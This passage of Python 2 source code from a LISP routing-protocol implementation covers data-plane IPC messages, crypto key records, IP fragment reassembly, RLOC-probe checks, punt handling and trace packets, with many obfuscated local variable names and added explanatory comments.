                O0OOOO0o0O = { "rle" : IiiIIi1, "port" : Oo0O00O }
                II11iI11i1, I11ii1i = Iii.get_encap_keys()
                O0OOOO0o0O = lisp_build_json_keys(O0OOOO0o0O, II11iI11i1, I11ii1i, "encrypt-key")
                i1ii1i1Ii11["rles"].append(O0OOOO0o0O)
    else:
        for I1IIiIIIii in mc.rloc_set:
            if (I1IIiIIIii.rloc.is_ipv4() == False and I1IIiIIIii.rloc.is_ipv6() == False):
                continue
            if (I1IIiIIIii.up_state() == False): continue

            Oo0O00O = str(4341) if I1IIiIIIii.translated_port == 0 else str(I1IIiIIIii.translated_port)
            O0OOOO0o0O = { "rloc" : I1IIiIIIii.rloc.print_address_no_iid(), "priority" :
                str(I1IIiIIIii.priority), "weight" : str(I1IIiIIIii.weight), "port" :
                Oo0O00O }
            II11iI11i1, I11ii1i = I1IIiIIIii.get_encap_keys()
            O0OOOO0o0O = lisp_build_json_keys(O0OOOO0o0O, II11iI11i1, I11ii1i, "encrypt-key")
            i1ii1i1Ii11["rlocs"].append(O0OOOO0o0O)

    if (dont_send == False): lisp_write_to_dp_socket(i1ii1i1Ii11)
    return (i1ii1i1Ii11)
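#
# Example of the IPC record built above, as serialized by
# lisp_write_to_dp_socket() (addresses and values hypothetical):
#
#   {"type": "map-cache", "opcode": "add", "instance-id": "0",
#    "eid-prefix": "10.1.0.0/16",
#    "rlocs": [{"rloc": "192.168.1.1", "priority": "1",
#               "weight": "100", "port": "4341"}]}
#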
def lisp_write_ipc_decap_key(rloc_addr, keys):
    if (lisp_i_am_itr): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    #
    # Get the decryption key. If there is none, do not send the IPC
    # message.
    #
    if (keys == None or len(keys) == 0 or keys[1] == None): return

    II11iI11i1 = keys[1].encrypt_key
    I11ii1i = keys[1].icv_key

    #
    # The RLOC may be keyed as "<address>" or "<address>:<port>".
    #
    ii1iiIi1I1 = rloc_addr.split(":")
    if (len(ii1iiIi1I1) == 1):
        i1ii1i1Ii11 = { "type" : "decap-keys", "rloc" : ii1iiIi1I1[0] }
    else:
        i1ii1i1Ii11 = { "type" : "decap-keys", "rloc" : ii1iiIi1I1[0], "port" : ii1iiIi1I1[1] }

    i1ii1i1Ii11 = lisp_build_json_keys(i1ii1i1Ii11, II11iI11i1, I11ii1i, "decrypt-key")

    lisp_write_to_dp_socket(i1ii1i1Ii11)
    return
def lisp_build_json_keys(entry, ekey, ikey, key_type):
    if (ekey == None): return (entry)

    entry["keys"] = []
    Oo000O000 = { "key-id" : "1", key_type : ekey, "icv-key" : ikey }
    entry["keys"].append(Oo000O000)
    return (entry)
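#
# Resulting shape (values hypothetical):
#
#   entry["keys"] = [{"key-id": "1", "encrypt-key": "<hex>",
#                     "icv-key": "<hex>"}]
#
# key_type is "encrypt-key" for map-cache records and "decrypt-key" for
# decap-keys records, matching the callers above.
#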
def lisp_write_ipc_database_mappings(ephem_port):
    if (lisp_i_am_etr == False): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    #
    # Write only IPv4 and IPv6 EID-prefixes from the database-mappings.
    #
    i1ii1i1Ii11 = { "type" : "database-mappings", "database-mappings" : [] }

    for ooOOo0ooo in lisp_db_list:
        if (ooOOo0ooo.eid.is_ipv4() == False and ooOOo0ooo.eid.is_ipv6() == False): continue
        III1II11i1 = { "instance-id" : str(ooOOo0ooo.eid.instance_id),
            "eid-prefix" : ooOOo0ooo.eid.print_prefix_no_iid() }
        i1ii1i1Ii11["database-mappings"].append(III1II11i1)
    lisp_write_to_dp_socket(i1ii1i1Ii11)

    #
    # Also tell the data-plane which ephemeral port the ETR is using for
    # NAT traversal.
    #
    i1ii1i1Ii11 = { "type" : "etr-nat-port", "port" : ephem_port }
    lisp_write_to_dp_socket(i1ii1i1Ii11)
    return
def lisp_write_ipc_interfaces():
    if (lisp_i_am_etr): return
    if (lisp_ipc_dp_socket == None): return
    if (lisp_check_dp_socket() == False): return

    i1ii1i1Ii11 = { "type" : "interfaces", "interfaces" : [] }

    for II1i in lisp_myinterfaces.values():
        if (II1i.instance_id == None): continue
        III1II11i1 = { "interface" : II1i.device,
            "instance-id" : str(II1i.instance_id) }
        i1ii1i1Ii11["interfaces"].append(III1II11i1)

    lisp_write_to_dp_socket(i1ii1i1Ii11)
    return
def lisp_parse_auth_key(value):
    O0ooooooOo0 = value.split("[")
    ooO0oOO0oOo00 = {}

    #
    # No "[<key-id>]" bracket syntax; the whole value is key-id 0.
    #
    if (len(O0ooooooOo0) == 1):
        ooO0oOO0oOo00[0] = value
        return (ooO0oOO0oOo00)

    for OOOOOOOo00 in O0ooooooOo0:
        if (OOOOOOOo00 == ""): continue
        ooo = OOOOOOOo00.find("]")
        I1I1I1 = OOOOOOOo00[0:ooo]
        try: I1I1I1 = int(I1I1I1)
        except: return

        ooO0oOO0oOo00[I1I1I1] = OOOOOOOo00[ooo + 1::]
    return (ooO0oOO0oOo00)
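#
# Illustrative check of lisp_parse_auth_key() behavior; this helper is
# not part of the original source:
#
#   "my-password"   -> {0: "my-password"}    (no key-id brackets)
#   "[1]foo[2]bar"  -> {1: "foo", 2: "bar"}
#   "[x]bad"        -> None                  (non-integer key-id)
#
def lisp_example_parse_auth_keys():
    assert lisp_parse_auth_key("my-password") == {0: "my-password"}
    assert lisp_parse_auth_key("[1]foo[2]bar") == {1: "foo", 2: "bar"}
    assert lisp_parse_auth_key("[x]bad") == None
    return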
def lisp_reassemble(packet):
    oo00o00O0 = socket.ntohs(struct.unpack("H", packet[6:8])[0])

    #
    # Not a fragment: flags/offset field of 0, or just the DF bit
    # (0x4000) set.
    #
    if (oo00o00O0 == 0 or oo00o00O0 == 0x4000): return (packet)

    i11iiI = socket.ntohs(struct.unpack("H", packet[4:6])[0])
    ooO00Oo = socket.ntohs(struct.unpack("H", packet[2:4])[0])

    #
    # The last fragment has the more-fragments bit (0x2000) clear and a
    # non-zero offset. Offsets are in units of 8 bytes; the entry stores
    # [byte-offset, payload-length, packet, is-last-fragment].
    #
    OOO00O0oO0 = (oo00o00O0 & 0x2000 == 0 and (oo00o00O0 & 0x1fff) != 0)
    i1ii1i1Ii11 = [(oo00o00O0 & 0x1fff) * 8, ooO00Oo - 20, packet, OOO00O0oO0]

    #
    # On the first fragment (more-fragments set, offset 0), check the UDP
    # ports; only LISP encapsulated packets (ports 4341, 8472, 4789) are
    # queued. Otherwise mark the packet ID so later fragments are dropped.
    #
    if (oo00o00O0 == 0x2000):
        oo0O, O0o0o0ooO0ooo = struct.unpack("HH", packet[20:24])
        oo0O = socket.ntohs(oo0O)
        O0o0o0ooO0ooo = socket.ntohs(O0o0o0ooO0ooo)
        if (O0o0o0ooO0ooo not in [4341, 8472, 4789] and oo0O != 4341):
            lisp_reassembly_queue[i11iiI] = []
            i1ii1i1Ii11[2] = None

    #
    # Create a queue for this packet ID if one does not exist.
    #
    if (lisp_reassembly_queue.has_key(i11iiI) == False):
        lisp_reassembly_queue[i11iiI] = []

    oOoo = lisp_reassembly_queue[i11iiI]

    #
    # A single queued None entry marks a non-LISP packet; drop its
    # fragments.
    #
    if (len(oOoo) == 1 and oOoo[0][2] == None):
        dprint("Drop non-LISP encapsulated fragment 0x{}".format(lisp_hex_string(i11iiI).zfill(4)))
        return (None)

    oOoo.append(i1ii1i1Ii11)
    oOoo = sorted(oOoo)

    #
    # Print the source and destination RLOCs of the fragment.
    #
    IiiIIi1 = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    IiiIIi1.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])
    oO000o0o0 = IiiIIi1.print_address_no_iid()
    IiiIIi1.address = socket.ntohl(struct.unpack("I", packet[16:20])[0])
    I1iI11I1II = IiiIIi1.print_address_no_iid()
    IiiIIi1 = red("{} -> {}".format(oO000o0o0, I1iI11I1II), False)

    dprint("{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}".format(bold("Received", False), " non-LISP encapsulated" if i1ii1i1Ii11[2] == None else "", IiiIIi1, lisp_hex_string(i11iiI).zfill(4),
        lisp_hex_string(oo00o00O0).zfill(4)))

    #
    # All fragments have arrived when the first entry starts at offset 0,
    # the last entry is marked "last fragment", and each fragment begins
    # where the previous one ended.
    #
    if (oOoo[0][0] != 0 or oOoo[-1][3] == False): return (None)
    OO00ooo0 = oOoo[0]
    for ii11I in oOoo[1::]:
        oo00o00O0 = ii11I[0]
        IIi1I, O00oO00ooo0ooOOOO = OO00ooo0[0], OO00ooo0[1]
        if (IIi1I + O00oO00ooo0ooOOOO != oo00o00O0): return (None)
        OO00ooo0 = ii11I
    lisp_reassembly_queue.pop(i11iiI)

    #
    # Concatenate payloads, stripping the 20-byte IP header from each
    # fragment after the first.
    #
    packet = oOoo[0][2]
    for ii11I in oOoo[1::]: packet += ii11I[2][20::]

    dprint("{} fragments arrived for packet 0x{}, length {}".format(bold("All", False), lisp_hex_string(i11iiI).zfill(4), len(packet)))

    #
    # Rebuild the IP header: new total length, zeroed fragment field and
    # checksum, then recompute the checksum.
    #
    IiiI1iii1iIiiI = socket.htons(len(packet))
    O0ooOoO0 = packet[0:2] + struct.pack("H", IiiI1iii1iIiiI) + packet[4:6] + struct.pack("H", 0) + packet[8:10] + struct.pack("H", 0) + packet[12:20]

    O0ooOoO0 = lisp_ip_checksum(O0ooOoO0)
    return (O0ooOoO0 + packet[20::])
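#
# Worked example of the fragment-field arithmetic above (values
# hypothetical): a flags/offset field of 0x2000 is a first fragment
# (more-fragments bit set, offset 0); 0x0185 is a final fragment
# (more-fragments bit clear) whose data starts 0x185 * 8 = 3112 bytes
# into the original payload.
#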
def lisp_get_crypto_decap_lookup_key(addr, port):
    oo0o00OO = addr.print_address_no_iid() + ":" + str(port)
    if (lisp_crypto_keys_by_rloc_decap.has_key(oo0o00OO)): return (oo0o00OO)

    oo0o00OO = addr.print_address_no_iid()
    if (lisp_crypto_keys_by_rloc_decap.has_key(oo0o00OO)): return (oo0o00OO)

    #
    # Fall back to searching for an "<address>:<port>" key with the same
    # address; if found, alias the address-only key to the same state.
    #
    for I1II1i in lisp_crypto_keys_by_rloc_decap:
        OO0o = I1II1i.split(":")
        if (len(OO0o) == 1): continue
        OO0o = OO0o[0] if len(OO0o) == 2 else ":".join(OO0o[0:-1])
        if (OO0o == oo0o00OO):
            iIi11III = lisp_crypto_keys_by_rloc_decap[I1II1i]
            lisp_crypto_keys_by_rloc_decap[oo0o00OO] = iIi11III
            return (oo0o00OO)

    return (None)
def lisp_build_crypto_decap_lookup_key(addr, port):
    addr = addr.print_address_no_iid()
    O0oOoOOOOo = addr + ":" + str(port)

    if (lisp_i_am_rtr):
        if (lisp_rloc_probe_list.has_key(addr)): return (addr)

        #
        # On an RTR, use "<address>:<port>" only for xTRs known to be
        # behind a NAT; otherwise key by address alone.
        #
        for IIiiiiII in lisp_nat_state_info.values():
            for oO0ooo in IIiiiiII:
                if (addr == oO0ooo.address): return (O0oOoOOOOo)
        return (addr)
    return (O0oOoOOOOo)
def lisp_set_ttl(lisp_socket, ttl):
    try:
        lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
        lisp_socket.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, ttl)
    except:
        lprint("socket.setsockopt(IP_TTL) not supported")
    return
def lisp_is_rloc_probe_request(lisp_type):
    lisp_type = struct.unpack("B", lisp_type)[0]
    return (lisp_type == 0x12)
def lisp_is_rloc_probe_reply(lisp_type):
    lisp_type = struct.unpack("B", lisp_type)[0]
    return (lisp_type == 0x28)
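#
# Note on the two constants above: in the LISP control header the high
# nibble of the first byte is the message type, so 0x12 is a Map-Request
# (type 1) with the probe bit set and 0x28 is a Map-Reply (type 2) with
# the probe bit set (RFC 6830).
#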
def lisp_is_rloc_probe(packet, rr):
    #
    # Must be UDP (IP protocol 17) to or from the LISP control port.
    #
    o0oOo00 = (struct.unpack("B", packet[9])[0] == 17)
    if (o0oOo00 == False): return ([packet, None, None, None])

    oo0O = struct.unpack("H", packet[20:22])[0]
    O0o0o0ooO0ooo = struct.unpack("H", packet[22:24])[0]
    i11i = (socket.htons(LISP_CTRL_PORT) in [oo0O, O0o0o0ooO0ooo])
    if (i11i == False): return ([packet, None, None, None])

    #
    # rr selects what to test for: 0 = RLOC-probe request, 1 = RLOC-probe
    # reply, -1 = either.
    #
    if (rr == 0):
        oO0oo000O = lisp_is_rloc_probe_request(packet[28])
        if (oO0oo000O == False): return ([packet, None, None, None])
    elif (rr == 1):
        oO0oo000O = lisp_is_rloc_probe_reply(packet[28])
        if (oO0oo000O == False): return ([packet, None, None, None])
    elif (rr == -1):
        oO0oo000O = lisp_is_rloc_probe_request(packet[28])
        if (oO0oo000O == False):
            oO0oo000O = lisp_is_rloc_probe_reply(packet[28])
            if (oO0oo000O == False): return ([packet, None, None, None])

    #
    # Drop RLOC-probes sourced by this system.
    #
    i1IIi1ii1i1ii = lisp_address(LISP_AFI_IPV4, "", 32, 0)
    i1IIi1ii1i1ii.address = socket.ntohl(struct.unpack("I", packet[12:16])[0])

    if (i1IIi1ii1i1ii.is_local()): return ([None, None, None, None])

    #
    # Return the LISP control payload plus the source address, source
    # port, and decremented TTL.
    #
    i1IIi1ii1i1ii = i1IIi1ii1i1ii.print_address_no_iid()
    Oo0O00O = socket.ntohs(struct.unpack("H", packet[20:22])[0])
    oOoooOOO0o0 = struct.unpack("B", packet[8])[0] - 1
    packet = packet[28::]

    O0OOOO0o0O = bold("Receive(pcap)", False)
    OOO000 = bold("from " + i1IIi1ii1i1ii, False)
    oo00ooOOOo0O = lisp_format_packet(packet)
    lprint("{} {} bytes {} {}, packet: {}".format(O0OOOO0o0O, len(packet), OOO000, Oo0O00O, oo00ooOOOo0O))

    return ([packet, i1IIi1ii1i1ii, Oo0O00O, oOoooOOO0o0])
def lisp_ipc_write_xtr_parameters(cp, dp):
    if (lisp_ipc_dp_socket == None): return

    iiiii1i1 = { "type" : "xtr-parameters", "control-plane-logging" : cp,
        "data-plane-logging" : dp, "rtr" : lisp_i_am_rtr }

    lisp_write_to_dp_socket(iiiii1i1)
    return
def lisp_external_data_plane():
    ooO0ooooO = 'egrep "ipc-data-plane = yes" ./lisp.config'
    if (commands.getoutput(ooO0ooooO) != ""): return (True)

    if (os.getenv("LISP_RUN_LISP_XTR") != None): return (True)
    return (False)
def lisp_process_data_plane_restart(do_clear=False):
    #
    # Touch the config file so the external data-plane rereads it, then
    # send the entire map-cache (or an empty one on a clear).
    #
    os.system("touch ./lisp.config")

    iiIiiI = { "type" : "entire-map-cache", "entries" : [] }

    if (do_clear == False):
        Oo0O0Oo0oo = iiIiiI["entries"]
        lisp_map_cache.walk_cache(lisp_ipc_walk_map_cache, Oo0O0Oo0oo)

    lisp_write_to_dp_socket(iiIiiI)
    return
def lisp_process_data_plane_stats(msg, lisp_sockets, lisp_port):
    if (msg.has_key("entries") == False):
        lprint("No 'entries' in stats IPC message")
        return
    if (type(msg["entries"]) != list):
        lprint("'entries' in stats IPC message must be an array")
        return

    for msg in msg["entries"]:
        if (msg.has_key("eid-prefix") == False):
            lprint("No 'eid-prefix' in stats IPC message")
            continue
        I11i11i1 = msg["eid-prefix"]

        if (msg.has_key("instance-id") == False):
            lprint("No 'instance-id' in stats IPC message")
            continue
        o0OoO0000o = int(msg["instance-id"])

        #
        # Look up the EID-prefix in the map-cache.
        #
        ooOOoo0 = lisp_address(LISP_AFI_NONE, "", 0, o0OoO0000o)
        ooOOoo0.store_prefix(I11i11i1)
        o0o000Oo = lisp_map_cache_lookup(None, ooOOoo0)
        if (o0o000Oo == None):
            lprint("Map-cache entry for {} not found for stats update".format(I11i11i1))
            continue

        if (msg.has_key("rlocs") == False):
            lprint("No 'rlocs' in stats IPC message for {}".format(I11i11i1))
            continue
        if (type(msg["rlocs"]) != list):
            lprint("'rlocs' in stats IPC message must be an array")
            continue
        IIiii1i1IiI = msg["rlocs"]

        #
        # Apply each per-RLOC counter delta to the map-cache entry.
        #
        for O0o0O00O in IIiii1i1IiI:
            if (O0o0O00O.has_key("rloc") == False): continue

            o0oooOoOoOo = O0o0O00O["rloc"]
            if (o0oooOoOoOo == "no-address"): continue

            I1IIiIIIii = lisp_address(LISP_AFI_NONE, "", 0, 0)
            I1IIiIIIii.store_address(o0oooOoOoOo)

            i1III111 = o0o000Oo.get_rloc(I1IIiIIIii)
            if (i1III111 == None): continue

            o00oooOOooo0 = 0 if O0o0O00O.has_key("packet-count") == False else O0o0O00O["packet-count"]
            IiIiIiiiI1 = 0 if O0o0O00O.has_key("byte-count") == False else O0o0O00O["byte-count"]
            i1 = 0 if O0o0O00O.has_key("seconds-last-packet") == False else O0o0O00O["seconds-last-packet"]

            i1III111.stats.packet_count += o00oooOOooo0
            i1III111.stats.byte_count += IiIiIiiiI1
            i1III111.stats.last_increment = lisp_get_timestamp() - i1

            lprint("Update stats {}/{}/{}s for {} RLOC {}".format(o00oooOOooo0, IiIiIiiiI1,
                i1, I11i11i1, o0oooOoOoOo))

        #
        # If the unicast entry's TTL has elapsed, refresh it with a new
        # Map-Request.
        #
        if (o0o000Oo.group.is_null() and o0o000Oo.has_ttl_elapsed()):
            I11i11i1 = green(o0o000Oo.print_eid_tuple(), False)
            lprint("Refresh map-cache entry {}".format(I11i11i1))
            lisp_send_map_request(lisp_sockets, lisp_port, None, o0o000Oo.eid, None)
    return
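#
# lisp_process_data_plane_decap_stats
#
# Process a "decap-statistics" IPC message. An ITR relays the message to
# the lisp-etr process, which owns decap state; an ETR folds the counters
# into lisp_decap_stats.
#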
def lisp_process_data_plane_decap_stats(msg, lisp_ipc_socket):

    #
    # If I am an ITR, relay the message to the lisp-etr process.
    #
    if lisp_i_am_itr:
        lprint("Send decap-stats IPC message to lisp-etr process")
        ipc = "stats%{}".format(json.dumps(msg))
        ipc = lisp_command_ipc(ipc, "lisp-itr")
        lisp_ipc(ipc, lisp_ipc_socket, "lisp-etr")
        return

    #
    # Process decap-stats in the lisp-etr process. The message arrives as
    # a string when relayed, so parse it back into JSON in that case.
    #
    ipc = bold("IPC", False)
    lprint("Process decap-stats {} message: '{}'".format(ipc, msg))

    if lisp_i_am_etr: msg = json.loads(msg)

    key_names = ["good-packets", "ICV-error", "checksum-error",
        "lisp-header-error", "no-decrypt-key", "bad-inner-version",
        "outer-header-error"]

    for key_name in key_names:
        pc = 0 if msg.has_key(key_name) == False else \
            msg[key_name]["packet-count"]
        lisp_decap_stats[key_name].packet_count += pc

        bc = 0 if msg.has_key(key_name) == False else \
            msg[key_name]["byte-count"]
        lisp_decap_stats[key_name].byte_count += bc

        ts = 0 if msg.has_key(key_name) == False else \
            msg[key_name]["seconds-last-packet"]
        lisp_decap_stats[key_name].last_increment = lisp_get_timestamp() - ts
    return
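#
# lisp_process_punt
#
# Process a punt message from the data-plane. The message is JSON and can
# be a "statistics", "decap-statistics", "restart", or "discovery" message.
# Discovery messages trigger dynamic-EID discovery and/or a Map-Request
# for the destination EID.
#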
def lisp_process_punt(punt_socket, lisp_send_sockets, lisp_ephem_port):
    message, source = punt_socket.recvfrom(4000)

    msg = json.loads(message)
    if type(msg) != dict:
        lprint("Invalid punt message from {}, not in JSON format".format(
            source))
        return

    punt = bold("Punt", False)
    lprint("{} message from '{}': '{}'".format(punt, source, msg))

    if msg.has_key("type") == False:
        lprint("Punt IPC message has no 'type' key")
        return

    #
    # Process statistics messages.
    #
    if msg["type"] == "statistics":
        lisp_process_data_plane_stats(msg, lisp_send_sockets, lisp_ephem_port)
        return
    if msg["type"] == "decap-statistics":
        lisp_process_data_plane_decap_stats(msg, punt_socket)
        return

    #
    # Process restart message.
    #
    if msg["type"] == "restart":
        lisp_process_data_plane_restart()
        return

    #
    # Process discovery message.
    #
    if msg["type"] != "discovery":
        lprint("Punt IPC message has wrong format")
        return
    if msg.has_key("interface") == False:
        lprint("Invalid punt message from {}, required keys missing".format(
            source))
        return

    #
    # Get instance-id for the interface the packet arrived on.
    #
    device = msg["interface"]
    if device == "":
        iid = int(msg["instance-id"])
        if iid == -1: return
    else:
        iid = lisp_get_interface_instance_id(device, None)

    #
    # Validate source-EID, if supplied.
    #
    seid = None
    if msg.has_key("source-eid"):
        source_eid = msg["source-eid"]
        seid = lisp_address(LISP_AFI_NONE, source_eid, 0, iid)
        if seid.is_null():
            lprint("Invalid source-EID format '{}'".format(source_eid))
            return

    #
    # Validate dest-EID, if supplied.
    #
    deid = None
    if msg.has_key("dest-eid"):
        dest_eid = msg["dest-eid"]
        deid = lisp_address(LISP_AFI_NONE, dest_eid, 0, iid)
        if deid.is_null():
            lprint("Invalid dest-EID format '{}'".format(dest_eid))
            return

    #
    # Do source-EID discovery if the source is covered by a
    # database-mapping configured for dynamic-EIDs.
    #
    if seid:
        e = green(seid.print_address(), False)
        db = lisp_db_for_lookups.lookup_cache(seid, False)
        if db != None:
            #
            # Check if dynamic-EID discovery is allowed on this interface.
            #
            if db.dynamic_eid_configured():
                interface = lisp_allow_dynamic_eid(device, seid)
                if interface != None and lisp_i_am_itr:
                    # Note: lisp_itr_discover_eid() below is defined with a
                    # trailing lisp_ipc_listen_socket parameter that this
                    # call does not supply in the original source.
                    lisp_itr_discover_eid(db, seid, device, interface)
                else:
                    lprint(("Disallow dynamic source-EID {} " +
                        "on interface {}").format(e, device))
        else:
            lprint("Punt from non-EID source {}".format(e))

    #
    # Send Map-Request for the destination EID if no map-cache entry found.
    #
    if deid:
        mc = lisp_map_cache_lookup(seid, deid)
        if mc == None or mc.action == LISP_SEND_MAP_REQUEST_ACTION:
            #
            # Rate-limit Map-Requests.
            #
            if lisp_rate_limit_map_request(deid): return
            lisp_send_map_request(lisp_send_sockets, lisp_ephem_port,
                seid, deid, None)
        else:
            e = green(deid.print_address(), False)
            lprint("Map-cache entry for {} already exists".format(e))
    return
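#
# lisp_ipc_map_cache_entry
#
# Callback used while walking the map-cache: serialize one entry and
# append it to the JSON array 'jdata'.
#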
def lisp_ipc_map_cache_entry(mc, jdata):
    entry = lisp_write_ipc_map_cache(True, mc, dont_send=True)
    jdata.append(entry)
    return ([True, jdata])
def lisp_ipc_walk_map_cache(mc, jdata):

    #
    # There is only destination state in this map-cache entry.
    #
    if mc.group.is_null(): return (lisp_ipc_map_cache_entry(mc, jdata))

    if mc.source_cache == None: return ([True, jdata])

    #
    # There is (source, group) state, so walk all sources for this group
    # entry.
    #
    jdata = mc.source_cache.walk_cache(lisp_ipc_map_cache_entry, jdata)
    return ([True, jdata])
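#
# lisp_itr_discover_eid
#
# Record a newly discovered dynamic-EID in its database-mapping entry and
# tell the lisp-etr process via IPC so it can be registered.
#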
def lisp_itr_discover_eid(db, eid, input_interface, routed_interface,
    lisp_ipc_listen_socket):

    eid_str = eid.print_address()
    if db.dynamic_eids.has_key(eid_str):
        db.dynamic_eids[eid_str].last_packet = lisp_get_timestamp()
        return

    #
    # Add to dynamic-EID dictionary in the lisp_mapping() entry.
    #
    dyn_eid = lisp_dynamic_eid()
    dyn_eid.dynamic_eid.copy_address(eid)
    dyn_eid.interface = routed_interface
    dyn_eid.last_packet = lisp_get_timestamp()
    dyn_eid.get_timeout(routed_interface)
    db.dynamic_eids[eid_str] = dyn_eid

    routed = ""
    if input_interface != routed_interface:
        routed = ", routed-interface " + routed_interface

    eid_string = green(eid_str, False) + bold(" discovered", False)
    lprint("Dynamic-EID {} on interface {}{}, timeout {}".format(eid_string,
        input_interface, routed, dyn_eid.timeout))

    #
    # Tell the lisp-etr process about the learned EID.
    #
    ipc = "learn%{}%{}".format(eid_str, routed_interface)
    ipc = lisp_command_ipc(ipc, "lisp-itr")
    lisp_ipc(ipc, lisp_ipc_listen_socket, "lisp-etr")
    return
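#
# lisp_retry_decap_keys
#
# When an ICV check fails, try the other decap crypto keys stored for
# this RLOC address; switch the active key when one verifies.
#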
def lisp_retry_decap_keys(addr_str, packet, iv, packet_icv):
    if lisp_search_decap_keys == False: return

    #
    # Don't do this for an entry that has a port in its address string.
    #
    if addr_str.find(":") != -1: return

    current_entry = lisp_crypto_keys_by_rloc_decap[addr_str]

    for key in lisp_crypto_keys_by_rloc_decap:

        #
        # Find other entries for the same address.
        #
        if key.find(addr_str) == -1: continue

        #
        # Skip the entry we are already using.
        #
        if key == addr_str: continue

        #
        # Skip entries that hold the same keys.
        #
        entry = lisp_crypto_keys_by_rloc_decap[key]
        if entry == current_entry: continue

        #
        # Test the ICV with the crypto key from the other entry.
        #
        crypto_key = entry[1]
        if packet_icv != crypto_key.do_icv(packet, iv):
            lprint("Test ICV with key {} failed".format(red(key, False)))
            continue

        lprint("Changing decap crypto key to {}".format(red(key, False)))
        lisp_crypto_keys_by_rloc_decap[addr_str] = entry
    return
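#
# LISP-Decent helpers. The mapping-system index for an EID is its sha256
# hash taken modulo 'lisp_decent_modulus', and the index is prepended to
# the configured DNS suffix. Hypothetical example: with
# lisp_decent_modulus = 10 and suffix "map.example.com", an EID whose
# hash yields index 7 maps to the DNS name "7.map.example.com".
#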
def lisp_decent_pull_xtr_configured():
    return (lisp_decent_modulus != 0 and lisp_decent_dns_suffix != None)
def lisp_is_decent_dns_suffix(dns_name):
    if lisp_decent_dns_suffix == None: return (False)
    name = dns_name.split(".")
    name = ".".join(name[1::])
    return (name == lisp_decent_dns_suffix)
def lisp_get_decent_index(eid):
    eid_str = eid.print_prefix()
    hash_value = hashlib.sha256(eid_str).hexdigest()
    index = int(hash_value, 16) % lisp_decent_modulus
    return (index)
def lisp_get_decent_dns_name(eid):
    index = lisp_get_decent_index(eid)
    return (str(index) + "." + lisp_decent_dns_suffix)
def lisp_get_decent_dns_name_from_str(iid, eid_str):
    eid = lisp_address(LISP_AFI_NONE, eid_str, 0, iid)
    index = lisp_get_decent_index(eid)
    return (str(index) + "." + lisp_decent_dns_suffix)
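#
# lisp_trace_append
#
# Append a node entry to the JSON body of a LISP-Trace packet and fix up
# the UDP/IP headers. Returns True when the caller should forward the
# packet; returns False when the trace could not be decoded or was
# returned to the sender because the next RLOC is unknown.
#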
def lisp_trace_append(packet, reason=None, ed="encap", lisp_socket=None,
    rloc_entry=None):

    offset = 28 if packet.inner_version == 4 else 48
    trace_pkt = packet.packet[offset::]
    trace = lisp_trace()
    if trace.decode(trace_pkt) == False:
        lprint("Could not decode JSON portion of a LISP-Trace packet")
        return (False)

    next_rloc = "?" if packet.outer_dest.is_null() else \
        packet.outer_dest.print_address_no_iid()

    #
    # If this is an encapsulating node and the encap port is non-standard,
    # include it in the destination RLOC string.
    #
    if next_rloc != "?" and packet.encap_port != LISP_DATA_PORT:
        if ed == "encap": next_rloc += ":{}".format(packet.encap_port)

    #
    # Build node entry for this hop.
    #
    entry = {}
    entry["node"] = "ITR" if lisp_i_am_itr else "ETR" if lisp_i_am_etr \
        else "RTR" if lisp_i_am_rtr else "?"

    srloc = packet.outer_source
    if srloc.is_null(): srloc = lisp_myrlocs[0]
    entry["srloc"] = srloc.print_address_no_iid()

    #
    # On the first ITR hop, include the originating host's source port.
    #
    if entry["node"] == "ITR" and packet.inner_sport != LISP_TRACE_PORT:
        entry["srloc"] += ":{}".format(packet.inner_sport)

    entry["hn"] = lisp_hostname
    key = ed + "-ts"
    entry[key] = lisp_get_timestamp()

    #
    # An ETR with no outer header can find the destination RLOC in its own
    # database-mappings.
    #
    if next_rloc == "?" and entry["node"] == "ETR":
        db = lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
        if db != None and len(db.rloc_set) >= 1:
            next_rloc = db.rloc_set[0].rloc.print_address_no_iid()

    entry["drloc"] = next_rloc

    #
    # Append reason string when the destination RLOC is unknown.
    #
    if next_rloc == "?" and reason != None:
        entry["drloc"] += " ({})".format(reason)

    #
    # Add RLOC-probe telemetry when available.
    #
    if rloc_entry != None:
        entry["rtts"] = rloc_entry.recent_rloc_probe_rtts
        entry["hops"] = rloc_entry.recent_rloc_probe_hops
        entry["latencies"] = rloc_entry.recent_rloc_probe_latencies

    #
    # Create the JSON record for this EID-pair if this is the first hop.
    #
    seid = packet.inner_source.print_address()
    deid = packet.inner_dest.print_address()
    if trace.packet_json == []:
        jd = {}
        jd["seid"] = seid
        jd["deid"] = deid
        jd["paths"] = []
        trace.packet_json.append(jd)

    #
    # Append this hop's entry to the matching record.
    #
    for jd in trace.packet_json:
        if jd["deid"] != deid: continue
        jd["paths"].append(entry)
        break

    #
    # If this is the destination ETR, add a return-path record so the
    # packet can be traced back to the sender.
    #
    swap = False
    if (len(trace.packet_json) == 1 and entry["node"] == "ETR" and
        trace.myeid(packet.inner_dest)):
        jd = {}
        jd["seid"] = deid
        jd["deid"] = seid
        jd["paths"] = []
        trace.packet_json.append(jd)
        swap = True

    #
    # Print trace and re-encode the JSON payload.
    #
    trace.print_trace()
    trace_pkt = trace.encode()

    #
    # If the next RLOC is unknown, return the packet to the sender's RLOC.
    #
    first_srloc = trace.packet_json[0]["paths"][0]["srloc"]
    if next_rloc == "?":
        lprint("LISP-Trace return to sender RLOC {}".format(first_srloc))
        trace.return_to_sender(lisp_socket, first_srloc, trace_pkt)
        return (False)

    #
    # Fix up UDP length and checksum in the inner header.
    #
    length = trace.packet_length()
    header = packet.packet[0:offset]
    udp = struct.pack("HH", socket.htons(length), 0)
    header = header[0:offset - 4] + udp
    if (packet.inner_version == 6 and entry["node"] == "ETR" and
        len(trace.packet_json) == 2):
        udp_header = header[offset - 8::] + trace_pkt
        udp_header = lisp_udp_checksum(seid, deid, udp_header)
        header = header[0:offset - 8] + udp_header[0:8]

    #
    # Swap IP addresses and UDP ports when returning the trace.
    #
    if swap:
        if packet.inner_version == 4:
            header = header[0:12] + header[16:20] + header[12:16] + \
                header[22:24] + header[20:22] + header[24::]
        else:
            header = header[0:8] + header[24:40] + header[8:24] + \
                header[42:44] + header[40:42] + header[44::]
